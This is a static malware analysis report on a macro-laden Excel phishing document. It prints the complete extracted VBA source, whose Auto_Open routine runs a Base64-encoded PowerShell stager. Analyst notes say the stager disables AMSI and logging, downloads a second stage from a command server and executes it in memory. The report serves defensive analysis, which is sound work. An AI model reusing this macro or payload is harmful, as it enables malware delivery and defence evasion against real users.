Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 47aa007d4818a7d2…

MALICIOUS

Office (OOXML)

21.6 KB Created: 2021-05-30 23:49:02 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-06-04
MD5: 236ea0b7d7acc711a15a5c6ad8aa5d9f SHA-1: 6417e24ddbd655d37b8ce984858b85c45e098477 SHA-256: 47aa007d4818a7d204a4f9cca4852470b2599d0581cff7a0451a0bd109af2eca
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute automatically upon opening, leveraging WScript.Shell and CreateObject to run a PowerShell command. The PowerShell command line is Base64-encoded (passed with -enc) and heavily obfuscated, but appears to be designed to download and execute a second-stage payload. The document body suggests a financial trading lure to trick users into enabling macros.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
            Set asd = CreateObject("WScript.Shell")
            asd.Run (x)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            Dim x As String
            x = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVg"
            x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
            Set asd = CreateObject("WScript.Shell")
            asd.Run (x)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This heuristic also covers documents whose macros exist only as p-code, or whose source extraction failed, so that no readable source is available.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Sub Auto_Open()
            pCb

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8014 bytes
SHA-256: 7231959c4d4e6787e1120713e912987a1e8911002aa96e5cda0e9b80ae3ffba5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Analyst note: Auto_Open is one of the legacy Excel auto-execution entry
' points; it runs as soon as the workbook is opened with macros enabled and
' does nothing except hand control to pCb, where the actual payload lives.
Sub Auto_Open()
        pCb
End Sub

' Analyst notes (report annotation, not part of the sample):
' pCb is the only routine with behaviour. It assembles one string, x, which is
' a complete powershell.exe command line, then launches it through
' WScript.Shell.Run (bottom of the function). The string is split across ~100
' concatenations purely to defeat simple string matching; no per-line logic is
' involved. Return value is never set or used.
'
' Command-line flags visible in the first fragment: -noP (skip profile),
' -sta (single-threaded apartment), -w 1 (hidden window), -enc (the rest of
' the string is the UTF-16LE Base64 encoding of the script to run).
'
' Decoding the -enc payload offline (not shown here) yields a script that
' appears to be a PowerShell Empire-style HTTP stager: it checks
' $PSVersionTable.PSVersion.Major, uses reflection on
' System.Management.Automation.Utils / AmsiUtils to switch off script block
' logging and mark AMSI initialisation as failed, builds a Net.WebClient with a
' fixed User-Agent, default proxy and default credentials, fetches a resource
' under '/admin/get.php' from a server whose address is itself stored as a
' second, nested Base64 string, and pipes the RC4-style-decrypted response to
' IEX. Treat the family attribution as "consistent with", not confirmed;
' re-derive every decoded value before using it as an indicator.
'
' Detection value for defenders: an Office process spawning powershell.exe with
' -enc, PowerShell logging/AMSI tampering via reflection, and the outbound HTTP
' request described above are the observable behaviours of this sample.
Public Function pCb() As Variant
        Dim x As String
        ' Fragment 1: the visible (unencoded) prefix of the command line.
        x = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVg"
        x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp"
        x = x + "AG8ATgAuAE0AQQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJAA1AD"
        x = x + "MARgAxAD0AWwByAGUAZgBdAC4AQQBzAHMAZQBtAEIATAB5AC4A"
        x = x + "RwBFAHQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbg"
        x = x + "BhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAu"
        x = x + "AFUAdABpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAATABEAC"
        x = x + "IAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMA"
        x = x + "eQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUA"
        x = x + "B1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAk"
        x = x + "ADUAMwBGADEAKQB7ACQAQQA2ADUAMwA9ACQANQAzAEYAMQAuAE"
        x = x + "cARQB0AFYAYQBsAHUARQAoACQATgB1AGwAbAApADsASQBGACgA"
        x = x + "JABBADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbw"
        x = x + "BjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYQA2ADUAMwBb"
        x = x + "ACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAG"
        x = x + "cAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAA"
        x = x + "dABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQ"
        x = x + "AwADsAJABhADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAn"
        x = x + "AGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAG"
        x = x + "IAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMA"
        x = x + "YQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdg"
        x = x + "BBAGwAPQBbAEMAbwBsAEwAZQBjAFQAaQBPAE4AUwAuAEcAZQBu"
        x = x + "AEUAUgBJAGMALgBEAGkAQwBUAEkATwBOAEEAUgBZAFsAcwB0AF"
        x = x + "IAaQBOAGcALABTAFkAUwB0AGUAbQAuAE8AYgBKAGUAYwBUAF0A"
        x = x + "XQA6ADoATgBlAFcAKAApADsAJABWAGEAbAAuAEEAZABkACgAJw"
        x = x + "BFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBj"
        x = x + "AGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEAbAAuAE"
        x = x + "EAZABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwA"
        x = x + "bwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbg"
        x = x + "BnACcALAAwACkAOwAkAEEANgA1ADMAWwAnAEgASwBFAFkAXwBM"
        x = x + "AE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AG"
        x = x + "EAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMA"
        x = x + "bwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaA"
        x = x + "BlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBM"
        x = x + "AG8AZwBnAGkAbgBnACcAXQA9ACQAVgBhAGwAfQBFAGwAcwBFAH"
        x = x + "sAWwBTAGMAcgBJAHAAVABCAGwATwBDAGsAXQAuACIARwBFAFQA"
        x = x + "RgBpAEUAYABsAEQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcw"
        x = x + "AnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh"
        x = x + "AHQAaQBjACcAKQAuAFMARQBUAFYAQQBMAFUAZQAoACQAbgB1AE"
        x = x + "wAbAAsACgATgBFAHcALQBPAEIASgBFAEMAdAAgAEMATwBMAEwA"
        x = x + "RQBjAFQAaQBvAE4AUwAuAEcAZQBOAEUAcgBJAEMALgBIAGEAUw"
        x = x + "BoAFMAZQBUAFsAUwBUAFIAaQBOAGcAXQApACkAfQAkAFIAZQBG"
        x = x + "AD0AWwBSAGUARgBdAC4AQQBTAHMARQBtAGIAbAB5AC4ARwBlAH"
        x = x + "QAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcA"
        x = x + "ZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQ"
        x = x + "BzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAEYALgBH"
        x = x + "AGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAC"
        x = x + "cAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkA"
        x = x + "YwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAQQBsAFUAZQ"
        x = x + "AoACQATgBVAGwAbAAsACQAdAByAFUAZQApADsAfQA7AFsAUwB5"
        x = x + "AHMAVABFAG0ALgBOAEUAVAAuAFMAZQBSAFYAaQBjAEUAUABvAE"
        x = x + "kAbgBUAE0AYQBuAEEAZwBFAFIAXQA6ADoARQB4AFAARQBDAFQA"
        x = x + "MQAwADAAQwBvAG4AVABJAE4AVQBFAD0AMAA7ACQAMQBmAGYANA"
        x = x + "A9AE4AZQB3AC0ATwBCAEoARQBDAHQAIABTAFkAcwB0AGUATQAu"
        x = x + "AE4ARQBUAC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQAnAE"
        x = x + "0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcA"
        x = x + "cwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcg"
        x = x + "BpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAAp"
        x = x + "ACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9AC"
        x = x + "QAKABbAFQAZQBYAFQALgBFAE4AYwBvAGQASQBOAEcAXQA6ADoA"
        x = x + "VQBOAGkAQwBPAGQARQAuAEcAZQBUAFMAdABSAEkATgBHACgAWw"
        x = x + "BDAG8ATgB2AEUAcgBUAF0AOgA6AEYAcgBPAG0AQgBBAHMARQA2"
        ' The next four fragments carry the nested Base64 string that holds the
        ' server address. Manually decoded, it appears to resolve to an http://
        ' URL on a private-range (RFC 1918) host and a non-standard port, which
        ' suggests a lab or test build; re-derive offline before using as an IoC.
        x = x + "ADQAUwB0AFIASQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAE"
        x = x + "EAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUA"
        x = x + "QQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdQBBAEQAaw"
        x = x + "BBAE8AUQBBADYAQQBEAGcAQQBPAEEAQQA0AEEARABnAEEAJwAp"
        x = x + "ACkAKQA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAH"
        x = x + "AAaABwACcAOwAkADEARgBGADQALgBIAEUAQQBEAEUAcgBzAC4A"
        x = x + "QQBEAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQ"
        x = x + "ApADsAJAAxAGYAZgA0AC4AUABSAG8AeABZAD0AWwBTAFkAcwB0"
        x = x + "AGUAbQAuAE4AZQBUAC4AVwBlAEIAUgBlAHEAVQBlAHMAVABdAD"
        x = x + "oAOgBEAGUAZgBBAFUATABUAFcAZQBCAFAAcgBPAHgAeQA7ACQA"
        x = x + "MQBGAEYANAAuAFAAUgBvAHgAeQAuAEMAUgBFAGQARQBuAFQAaQ"
        x = x + "BBAGwAcwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBlAFQALgBD"
        x = x + "AHIAZQBEAGUAbgBUAGkAQQBMAEMAYQBDAEgARQBdADoAOgBEAE"
        x = x + "UARgBhAHUATAB0AE4ARQB0AFcATwByAGsAQwByAEUAZABlAG4A"
        x = x + "VABJAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQ"
        x = x + "AgAD0AIAAkADEAZgBmADQALgBQAHIAbwB4AHkAOwAkAEsAPQBb"
        x = x + "AFMAWQBzAHQAZQBtAC4AVABFAFgAdAAuAEUAbgBDAG8AZABJAE"
        x = x + "4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAVABlAHMA"
        x = x + "KAAnADcAbABrACsALgA5AD4AYgAwAHwAMQBtAG4AQAA/ACkAZA"
        x = x + "BbACEAcQB7AFYAMgAzACwAcgB6AF0AVABDACUAZgAnACkAOwAk"
        x = x + "AFIAPQB7ACQARAAsACQASwA9ACQAQQByAEcAUwA7ACQAUwA9AD"
        x = x + "AALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0A"
        x = x + "KAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASw"
        x = x + "AuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBd"
        x = x + "ACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbAC"
        x = x + "QAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkA"
        x = x + "JQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQ"
        x = x + "AlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9"
        x = x + "ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAH"
        x = x + "gATwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgA"
        x = x + "XQApACUAMgA1ADYAXQB9AH0AOwAkADEARgBmADQALgBIAGUAYQ"
        x = x + "BEAEUAcgBTAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAi"
        x = x + "AHYAcABmAEEAYgBaAEMAYQB1AGsAdABHAEoAWQA9AHcAMABDAH"
        x = x + "UASgBEAHoAVwBRAGUAUQAyAFQARABXAGwANABvAHkAUABTAE4A"
        x = x + "cAB6AGsAdgBzAD0AIgApADsAJABkAGEAdABBAD0AJAAxAEYAZg"
        x = x + "A0AC4ARABPAFcATgBMAG8AYQBEAEQAQQB0AGEAKAAkAHMARQBS"
        x = x + "ACsAJABUACkAOwAkAGkAVgA9ACQAZABBAFQAYQBbADAALgAuAD"
        x = x + "MAXQA7ACQAZABhAHQAQQA9ACQAZABhAFQAQQBbADQALgAuACQA"
        x = x + "RABhAHQAYQAuAEwARQBuAGcAVABIAF0AOwAtAGoATwBpAG4AWw"
        x = x + "BDAGgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAg"
        ' Final fragment; the decoded tail ends by piping the downloaded,
        ' decrypted data into IEX (Invoke-Expression), i.e. in-memory execution.
        x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
        ' Late-bound COM launch: WScript.Shell.Run starts the command line in a
        ' new process, so powershell.exe appears as a child of EXCEL.EXE. The
        ' return value of Run is discarded and no error handling is present.
        Set asd = CreateObject("WScript.Shell")
        asd.Run (x)
End Function

' Analyst note: document module for the workbook object. Only the exported
' module attributes are present; no procedures or event handlers follow, so
' this module contributes no behaviour to the sample.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Analyst note: document module for the single worksheet. As with
' ThisWorkbook, only exported attributes are present and no code follows;
' all executable logic lives in Module1 (Auto_Open -> pCb).
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24576 bytes
SHA-256: 5f5d78c0e64c9d7da8e7758f822dd2e6b31e7cd605d0550a034cc0604a6f4c12